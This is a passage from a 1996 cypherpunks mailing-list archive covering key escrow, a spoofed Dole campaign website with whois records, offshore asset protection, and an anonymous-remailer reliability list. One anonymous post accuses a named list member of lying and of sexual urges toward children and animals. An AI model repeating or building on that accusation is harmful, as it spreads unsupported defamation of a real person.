> At the end of the two years, they tell computer companies:
> 	Either you implement your system, or you stop exporting your products.
> 	If we don't like the system that you come up with, we won't approve it; and you can't export your (by then) existing products any more.
> 
> 
> The computer industry has to pay the costs for developing this system, _and_, since they developed it, it is really hard for them to complain about the details of it.
> 
> Somebody in Washington has a lot on the ball.

Much of this is Gorelick and her fledglings doings.

> -- Marshall
> 
> Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 7 Oct 1996 16:30:29 +0800
To: Rick Campbell <campbell@c2.net>
Subject: Re: Dole web site cracked?
In-Reply-To: <9610070342.AA24124@cfdevx1.lehman.com>
Message-ID: <Pine.SUN.3.94.961007022752.17782L-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, Rick Campbell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> So, I just finished watching the debate and at the very end, Bob Dole
> suggested that people check out www.dole-kemp.org.  I was already on
> playing decision96.digital.com so I went for it.
> 
> The first page says ``Oops!  You've tried to access the old
> way.  Please choose the new way instead.''  Clicking on `new' gives a
> black background page with two yellow arrows, one left and one right.
> The left one gives you ``Nope, you can't go back now''.  The Right one
> gives you www.cg96.org, the Clinton-Gore home page.

Concur.

Cute, though perhaps giving the clinton page the right arrow was the wrong
move.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 7 Oct 1996 16:47:03 +0800
To: Rick Campbell <campbell@c2.net>
Subject: Re: Dole web site cracked?
In-Reply-To: <9610070342.AA24124@cfdevx1.lehman.com>
Message-ID: <Pine.SUN.3.94.961007023330.17782N-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, Rick Campbell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> So, I just finished watching the debate and at the very end, Bob Dole
> suggested that people check out www.dole-kemp.org.  I was already on
> playing decision96.digital.com so I went for it.
> 
> The first page says ``Oops!  You've tried to access the old
> way.  Please choose the new way instead.''  Clicking on `new' gives a
> black background page with two yellow arrows, one left and one right.
> The left one gives you ``Nope, you can't go back now''.  The Right one
> gives you www.cg96.org, the Clinton-Gore home page.

Actually, on further examination, looks like a cute little spoof, not a
hack.

The address for the actual dole page is : www.dolekemp96.org

The source of the erronious information might be considered its origin as
well, all things considered.

> --
> Rick Campbell <campbell@c2.net>	      ``One of the symptoms of an approaching
>   http://www.c2.net/~campbell/		nervous breakdown is the belief that
> 					one's work is terribly important.''
> 							- Bertrand Russel

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: travel23@juno.com (The Traveler)
Date: Mon, 7 Oct 1996 19:23:57 +0800
To: cypherpunks@toad.com
Subject: Re: PGP [2d try]
Message-ID: <19961007.050106.3334.0.travel23@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


  Apologies but the word-wrapping was different than the appearance it
had as I typed my previous message.  It should have read:

>...as fertiliser as ....
          ^^^^^^^^^

   "Fertiliser" was, of course, the word to which I was referring when I
stated that this was the British/European spelling.
   I found it to be an interesting clue regarding the author's identity -
FWIW.....

T.T.


    
.................................................................................
              Just consider me an acorn who is trying
                   to deal with the rest of the nuts 
    
.................................................................................






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 7 Oct 1996 19:58:24 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Put up or shut up!
In-Reply-To: <Pine.3.89.9610062326.A29159-0100000@netcom22>
Message-ID: <Pine.SUN.3.94.961007044754.17782O-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Lucky Green wrote:

> 
> 
> 
> On Mon, 7 Oct 1996, Black Unicorn wrote:
> > I'll wager, though I have no data to back it up, that most of the people
> > in this forum who are uncertain about the safety of their assets don't
> > bother to engage in the most basic of asset preservation tactics, namely:
> > geographic diversification.
> > 
> > Surprising considering the perfectly legal options which would protect
> > many of them.
> 
> Not to me. Geographic diversification requires either significant 
> research on part of the individual or trusting one's assets to the 
> goodwill of third party consultants.

Investment in mutual funds requires the same leaps.  Doesn't seem to stop
people from buying them in record numbers.  Why don't more people
represent themselves in court?  Because it requires significant research.
But that's not to say experts are not to be found, nor that they should
not be consulted.

Unless you are an expert, you shouldn't be mucking around in engineering,
crypto design, legal work, or asset protection.  Consult an expert please.

> There are a number of individuals on this list that have claimed in the 
> past to know the detailed techniques required to achieve such 
> diversification. Not one of them has ever posted "How To" instructions to 
> the list. Sure, we heard many generalities, but never concrete instructions.

No one has ever posted any real worth while "how to" instructions as to
how to diversify your stock portfolio either.  That's what professionals
are paid for.  You get what you pay for.  If you tell an investment
manager that protection from seizure is a consideration in investment,
you'll get results.  No one bothers to do this.  No one bothers to invest
in careful ways.  It's merely one more criteria and a rather mundane one
at that.  Yet no one bothers.

I posted the massive kludge I did because I hoped it would increase
awareness a bit.  I did get a pile of encrypted messages asking me if I
would help so and so invest $10,000 safely abroad for free.  Not exactly
the kind of work I do, but it does show the interest.

> Tim has asked several times on this list for details, but, to the best of my 
> knowledge, was never provided with a workable solution to secure his 
> fortune, most of which seems to be held in stock in the US.

No one can expect real financial advice over an internet mailing list.
Let's not forget where we are afterall.  What I will tell you that it is
possible, and there is a market for the service.  A potent market.  I
don't know what Mr. May holds, what his interests are, nor what his
specific problems or dispositions are.  The thought that there is some
list member who can say "Yeah, just dump it into a foreign shell
corporation and reinvest it all in the U.S." is silly.  It's on par with
the radio ads which proclaim "You too can make a fortune in heating oil!
Doesn't it make sense that prices will rise in the winter?"  There is no
one good solution, and anyone who sells you a universal package is selling
you a bill of goods.

Careful, professional, and highest quality service is required to properly
design any investment design.  Again, you get what you pay for.

The precursor to getting the market for asset protection to be wider scale
is to increase awareness.  In the way that the stock market is available
to the individual, I'd like to see (among others) the asset protection
market available to the individual.  Put the tools out there and begin to
isolate the experts from the general public.  There are, believe it or
not, very few experts today.  Most of them in banking secrecy
jurisdictions where the clients are.  That's stagnating.  Let's change
that.

> Compare this to the dozens of FAQs available for crypto. If they were 
> limited to "find some cryptographic software, it will protect your data", 
> considerably fewer individuals would use PGP.

Crypto is mostly technological know how.  It is easily reduced to code.  I
submit that asset management is not..  Were it then the measure of a
profitable bank would be the power of its trading and investment software.

> Crypto FAQs have URLs, step-by-step instructions, etc. I have not seen 
> anything even remotely like it for asset diversification.

And if you are sending e-mail this is fine.  If you are designing a crypto
system for a financial instituion, it is not.  I'm surprised I have to
point out this difference.  I cannot believe that anyone on this list
could do more than tell the layman what NOT to do.  I can't imagine that
advice from someone on this list to a bank manager, or some other "real
money" interest would be anything other than "Don't do it yourself, ignore
the hype, ignore the how to guides and _seek professional help
immediately_."  I think also that many of the people on this list ARE the
experts.  That tends to make comparison to the level of asset protection
content on this list a bit skewed.  I don't know how many asset protection
experts are on this list, I suspect the number is smaller than the crypto
expert one.

I will be the first to denounce the "pay no taxes" "hide your assets"
"second passports" ads you see in the back of the Economist.  In my
personal opinion, "Scope" and all that perpetual traveler literature is
trash.  In my professional opinion, anyone with over US$200,000 in free
assets can benefit from some restructuring.  In some cases with minimal
increase in long term fees and often with a _substantial_ increase in
personal attention and service.  The American banking market is robust,
but hardly attentive.  It is a retail market and is designed in most cases
like fast food counters.  U.S. banks make a pile of money on fees because
people are lazy in the United States.  They would sooner use the atm right
in front of them than walk a block and save a buck in fees.  Walking might
be worth it, but I submit that the consequences of poor asset management
are almost never worth it.

I suggest that you just walk into a bank in Luxembourg, Liechtenstein,
perhaps in Switzerland and compare the experience to doing the same in the
United States.  It may be a bother to get to a real bank, but the
difference in service, attitude, and skill can be substantial.

You get what you pay for in sweat too.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 8 Oct 1996 13:48:46 +0800
To: Black Unicorn <jya@pipeline.com>
Subject: Re: EUB - Pay attention next time guys.
Message-ID: <199610080101.SAA05272@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:09 PM 10/7/96 -0400, Black Unicorn wrote:
> EUB is probably in more trouble than they realize because they chose an
> interesting solution to their bandwidth problem. 
>
> [...]
>
> Prediction: EUB will change its structure dramatically in the next 6
> months if it still exists at all in that time. 

Prediction:  Nothing much will happen to European Union bank.

Possibily their US web site will be closed down, in which case 
twenty guys will echo it, and they will have to pay more for bandwidth.

> Lesson learned: Never
> involve the United States directly. 

Lesson learned.  The United States is just a speed bump on the information
highway.

The critical error is not involving the United States directly, the 
critical error is leaving assets or information in a place and form 
where US thugs with guns can get at it.

I see no reason to believe the EUB has made this error.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 7 Oct 1996 20:45:57 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Put up or shut up!
In-Reply-To: <v03007806ae7e5a192957@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.961007052149.17782Q-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, Timothy C. May wrote:

> At 1:40 AM -0400 10/7/96, Black Unicorn wrote:
> 
> >Interesting that if the transition to crypto anarchy includes any phase
> >of conflict between the state and the individual, failing to properly
> >protect those assets may result in their seizure anyhow.  If they are
> >attachable now, as you seem to suggest, then they are attachable then.
> >
> >I know that Mr. May has, in past, been a asset protection "naysayer," but
> >this falls into a general, and disturbing, pattern.
> 
> Please call me "Tim," not the stuffy, formal, "Mr. May."
> 
> It is not that I am a naysayer, it is that the proposals I have read about
> or seen discussed here have not been convincing to me, in my particular
> situation. I've even done some on-site research in the Bahamas and Monaco,
> and neither seemed a good solution. (And a friend of mine travelled to
> several other Caribbean islands, plus the Channel Islands, Guernsey, etc.
> He had several schemes he was working on, but the laws in some of his best
> prospects changed and his plans fell through.)

I've never been fond of some of these for a myrid of reasons.

> My primary concern is *tax avoidance* (I emphasize "avoidance" over
> "evasion"), not the "judgement-proofing" or "insurance settlement-proofing"
> most of the published books emphasize. (This is where someone will say,
> "Ah, but that's because they're the _published_ books, the ones available
> to Joe Doe in Barnes and Noble. The _real_ stuff is contained in
> self-published books, the kind the media conglomerates won't touch. Send
> $295 for this informative pamphlet....")

Someone will indeed say that.  I am not that someone.  The lack of tax
avoidance materials directed towards U.S. interests is mostly because
there are very few offshore tax avoidance options open any longer to U.S.
citizens.  Most have been very effectively legislated away.

> It turns out that I would save nothing in taxes by moving some of my liquid
> assets to some particular coral atoll. (Unless I lie on my 1040, which is
> always an option.)

An unsurprising result.
 
> If Black Unicorn would do things differently with my money, fine. But I
> have seen nothing that is very convincing to me.

If tax avoidance is your major concern, there is not a whole lot more I
would do.  I may have some suggestions, but taxation is not really the
kind of thing I could do you any good with.  Whatever I did suggest would
be more fine tuning than anything else.

Unless you are engaged in major international business, there are few
taxation breaks for U.S. citizens.  I believe I've discussed this before.

But the concern I raised was not tax avoidance, for which offshore
solutions provide little help to the average U.S. citizen, but asset
protection.  Political Risk protection.

> And I've seen a lot of "creative" ideas that just don't fit my situation.
> The "perpetual tourist" notion, pushed by Duncan and others, doesn't fit my
> notion of living in one place. Nor do I want to bounce around Europe for
> years and years. (A great place to visit, but....) Nor am I much interested
> in protecting an asset as comparatively trivial as my vehicle by setting up
> a Nevada corporation which then leases me back the vehicle as part of my
> Amway distributorship, blah blah. Too much paperwork and "IRS alerts" for
> too little gain. And so on.

I wont presume to analyze your financial holdings, but it sounds like a
substantial amount is in stock.  That's vulnerable to all manner of
nasties.

I don't know your situation exactly, but it is my view that in general,
and in my personal experince, holding large amounts of U.S. stock solely
in your own name is a bad idea.  I'm not suggesting that these assets be
hidden from tax authorities, but involving the laws and stability of
another goverment in the ownership determination is a nice thing to do.
If an individual makes accurate disclosures on his or her tax returns is
not something I'm going to get into.  I'm simply talking about structuring
the assets in such a way that attacks on you personally won't necessarly
impoverish you as well as anything else.

> >I'll wager, though I have no data to back it up, that most of the people
> >in this forum who are uncertain about the safety of their assets don't
> >bother to engage in the most basic of asset preservation tactics, namely:
> >geographic diversification.
> >
> >Surprising considering the perfectly legal options which would protect
> >many of them.
> 
> Well, I get pretty tired of these vague claims that float out, with no
> particulars ever presented. (I know, I know, if I want particulars I should
> hire you...sorry, not in my plans.)

I'm not for hire.  I'd be happy to suggest, in person, some financial
institutions in which I have no interests which you may wish to
investigate, none of which are less than 100 years old.

I can tell you some of the things that might be suggested to you.  A
banker might suggest estlablishing a foreign trust, in one of many
different forms, and reinvesting the funds in the U.S. market as you wish.
It will be suggested to you that you make all the proper disclosure to the
tax authorities of the United States, but also explained to you that
outright seizures of the funds will be resisted with vigor.  Records
will be outside of the United States with the exception of your tax
filings which are of little use to someone trying to outright seize
assets abroad.  Much better than you can expect in the United States
without doubt.  You think Citibank is going to fight in court to withhold
your records?

It might be suggested, if you have more active interests, that a
corporation be formed, that the assets be placed under management in that
form and left more convertable.

The point is that you involve another jurisdiciton in confiscation
proceedings.  This is not a matter of getting rich quick, or filling out
this "declaration of personal sovereignty" form.  It's not about tax
evasion either.

This is only one aspect of asset protection.  If you don't trust the U.S.
government to give you a fair shake, or if you feel you might eventually
be the victim of a suspicious persecution, or if you are wary of the
political winds in the United States, I would think you would run, not
walk, to deposit some money abroad.  Thousands of Europeans saved
themselves, their families and their fortunes by being a bit skeptical
about keeping their money in one country in the 30's and 40's.  This was
the original and completely legitimate reason that Switzerland and
Liechtenstein became known for banking secrecy.  They were equally
friendly to Nazi's who hid wealth before during and after the war I
might add.  This is, in my view, as it should be.  Financial
institutions should not be interested in the politics of their
clients.  That nosiness is the path to more intrusive invasions and
any financial institution which exhibits these trends should be
avoided at all costs in my view.  Most of the Islands came to popularity
during the 70's and the 80's tax evasion and drug money crazes.  Their
reliability is to be considered in this context.

I'm not selling my services here.  I have enough to worry about without
the cypherpunks rushing to retain me to manage their money.  (As much of a
fan of pseudonymity as I am, I will tell you not to give money to a nym
for asset protection reasons unless you are that nym and I'm not about
to expose myself to someone on the list because they claim to have
$25,000 to invest).

There are no U.S. banks which will do this kind of thing because banking
secrecy and questioning the legitimacy of asset seizure proceedings is
something viewed with suspicion in the United States.  This is not so
everywhere in the world.  It is not illegal, last I checked, to give
a foreign bank the privilege of managing your money.

The day it becomes so is the day it becomes apparent that the United
States expects eventually to have to wrech that money from you by force.
It will also be the day it is too late.

Look, I don't know if there is a revolution around the corner which will
make numbers in the Citibank computer disappear or something, but I sleep
better knowing that my money is not at the mercy of the political tide in
any one country.

> (Not directed at Black Unicorn, but at others: Please, let's not start a
> thread about how stupid Tim is with his money, about how all true goldbugs
> know how to convert their assets into 17 Kruggerands which they they bury
> in the backyard, about how foolish Tim is to ignore all the helpful free
> advice from fabulously successful fellow list members who have figured out
> how to avoid taxes, protect assets, and live the carefree life of the
> Perpetual Tourist! If your plan works for you, that ought to be
> enough--yoiu don't have to sell me on it. And please, no more advice about
> selling short against the box.)

Thanks for ommiting me.  :)

Seriously, there are much better banking and management services to be had
than exist in the United States.

I was talking to another list member about the differences.  I don't
recall who it was, but he might wish to chime in on the subject.

I'll suggest some places to look to anyone who enquires seriously.
Currently I don't do direct referrals, and I don't sell the financial
services of institutions in which I have an interest.  In the rarest of
cases I would consider writing, free of charge, letters of introduction
to european institutions for extremely serious and credible investors but
I make no promises at all.

This is not legal advice.  You didn't pay for it.  Do your homework 
whatever it is anyone tells you.

> 
> --Tim May
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 7 Oct 1996 20:47:42 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Dole web site cracked?
In-Reply-To: <3.0b19.32.19961007061604.00d1fb60@panix.com>
Message-ID: <Pine.SUN.3.94.961007061526.17782R-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Duncan Frissell wrote:

> Long ago, someone registered dole96.org and has been running a satirical
> site for some time.  The Dole campaign registered dole96.com and
> dolekemp96.org, and dolekemp96.com (and maybe more).  It is hard to get all
> of the variations of a domain name registered.


So it would seem.  :)

> 
> DCF
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 7 Oct 1996 20:43:01 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Dole web site cracked?
Message-ID: <3.0b19.32.19961007061604.00d1fb60@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Long ago, someone registered dole96.org and has been running a satirical
site for some time.  The Dole campaign registered dole96.com and
dolekemp96.org, and dolekemp96.com (and maybe more).  It is hard to get all
of the variations of a domain name registered.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 8 Oct 1996 03:13:37 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199610071350.GAA08779@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash ksub latent cut ek mix reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 7 Oct 96 6:48:08 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          *****. *--**    21:20 100.00%
dustbin  dustman@athensnet.com            ++---. ++--+  1:50:34  99.98%
exon     remailer@remailer.nl.com         -#***# *####     3:27  99.94%
balls    remailer@huge.cajones.com        ****** *-***     5:37  99.86%
amnesia  amnesia@chardos.connix.com       ---+-. ----   3:40:20  99.53%
haystack haystack@holy.cow.net            *####* ** ##     4:32  99.49%
winsock  winsock@c2.org                   -..-+. -+++   3:31:52  99.14%
cyber    alias@alias.cyberpass.net        **+**.  -*-     43:47  99.14%
mix      mixmaster@remail.obscura.com     --+  _ +++++  6:57:10  98.90%
extropia remail@miron.vip.best.com        ----_. ---   10:51:38  98.43%
squirrel mix@squirrel.owl.de              +++  . +---   2:28:31  98.04%
lead     mix@zifi.genetics.utah.edu         .-*. +---+  1:20:44  97.84%
middle   middleman@jpunix.com             - + -. - --   3:47:45  96.62%
replay   remailer@replay.com              **  *.   ***    10:42  77.10%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 8 Oct 1996 01:43:21 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <Pine.SUN.3.94.961006231010.16819B-100000@polaris>
Message-ID: <199610071307.JAA04143@nrk.com>
MIME-Version: 1.0
Content-Type: text


[credit card]

Any thought of privacy is a joke. Just because Punk's, Ltd.
control the issuing bank, the clearinghouses in the middle
will gleefully collect all the data and sell it.

That would include the holders transactions, address, you name it.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 8 Oct 1996 05:08:08 +0800
To: cypherpunks@toad.com
Subject: A daily warning regarding Dmitri Vulis
Message-ID: <199610071608.JAA27152@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



Dmitri vulis is a liar and fills this list with lies,
personal attacks and material having nothing to do with
cryptography.
He also has unnatural sexual urges towards children,
animals and other such items.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 8 Oct 1996 05:00:21 +0800
To: cypherpunks@toad.com
Subject: Libel & Pseudonymous Reputation
Message-ID: <199610071624.JAA06988@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


A new item at the EFF archives might be of interest:

http://www.eff.org/pub/Legal/CyberLaw_Course/cyberlaw.038
 - CYBERSPACE LAW FOR NON-LAWYERS: Topic: Libel 7: Injury
   to a Pseudonym's Reputation?

--
<HTML><A HREF="http://www.eff.org/~mech">     Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org">          Electronic Frontier Foundation
</A><P>      Program Director    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 8 Oct 1996 02:04:15 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper spin [was Re:Flood Warning]
Message-ID: <199610071332.GAA08581@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> [...]
> >
> >   High-Tech Leaders Join Forces to Enable International
> >   Strong Encryption
> >
> >      See: http://www.ibm.com/news/alliance2.htm
> 
> The "International Strong Encryption" phrase is something that we
> need to become active in stopping.  Anything which responds to such
> announcements should put a different spin on this phrase.  If the
> Clipper farce is accepted as "strong" encryption then the battle is
> lost; maybe something like "it is _international_ strong encryption
> because it is the strongest encryption people like Saddam Hussein [insert
> bogeyman du jour] want Americans to have access to"
> 
> jim

Back when IBM/Lotus came out with it's "International" version, I 
proposed the term 'espionage-enabled software'. I still like it.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Tue, 8 Oct 1996 03:49:31 +0800
To: Rick Campbell <campbell@c2.net>
Subject: Re: Dole crack mirror
In-Reply-To: <9610070441.AA25360@cfdevx1.lehman.com>
Message-ID: <Pine.BSI.3.91.961007095517.29388A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Rick Campbell wrote:

> I put a copy of the stuff that I found at http://www.dole-kemp.org/ at
> http://www.c2.net/~campbell/www.dole-kemp.org/
> 
> Basically, there was very little to the content:  a couple of pages
> and a few images.  The link to the Clinton-Core page was through
> http://www.dole-kemp.com/ (Note .com rather than .org) where one of
> the links there redirects immediately to
> http://www.cg96.org/new/index2.htm

    It looks like the page is dated September 11th though.  Is this a 
case of a file date change or has no one cared enough to change the site 
since last month?  Or, has the file existed on the system since then, 
laying in wait for the debates last night?

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      "We don't want to get our butts kicked by a bunch of long-haired 
        26-year-olds with earrings." -- General John Sheehan on their 
                       reasons for InfoWar involvement





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Tue, 8 Oct 1996 04:42:52 +0800
To: cypherpunks@toad.com
Subject: Re: Dole web site cracked?
In-Reply-To: <Pine.SUN.3.94.961007023330.17782N-100000@polaris>
Message-ID: <Pine.BSI.3.91.961007100529.29388B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Black Unicorn wrote:

> Actually, on further examination, looks like a cute little spoof, not a
> hack.
> 
> The address for the actual dole page is : www.dolekemp96.org

    But, which one of these DNS entries looks more official?

    This:

 > whois dolekemp96.org                             

Iguana, Inc. (DOLEKEMP2-DOM)
   122 S. Hardy Dr. Suite #47
   Tempe, AZ 85281
   US
 
   Domain Name: DOLEKEMP96.ORG
 
   Administrative Contact, Technical Contact, Zone Contact:
      Salvato, Vince  (VS91)  vince@IGUANA.NET
      602-968-4752 (FAX) 602-968-1864
   Billing Contact:
      Kubasko, Robert  (RK567)  rob@GETCAUGHT.COM
      602-968-4752
 
   Record last updated on 03-Sep-96.
   Record created on 10-Aug-96.
 
   Domain servers in listed order:
 
   NOC.CERF.NET                 192.153.156.22
   GETCAUGHT.COM                165.247.64.105
   

or

 > whois dole-kemp.org                            

Election 96 (DOLE-KEMP2-DOM)
   400 North Capitol Street, NW
   Washington, DC 20001
   US
 
   Domain Name: DOLE-KEMP.ORG
 
   Administrative Contact, Technical Contact, Zone Contact:
      FPP Network Operations Center  (FPP-NOC)  noc@penguin.net
      (703) 358-9219  fax (703) 522-2798
 
 
   Billing Contact:
      Department, Billing  (BD893)  billing@PENGUIN.NET
      01.703.358.9219
 
   Record last updated on 10-Aug-96.
   Record created on 10-Aug-96.
 
   Domain servers in listed order:
 
   NS.PENGUIN.NET               204.29.198.1
   NS2.PENGUIN.NET              204.29.198.4

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
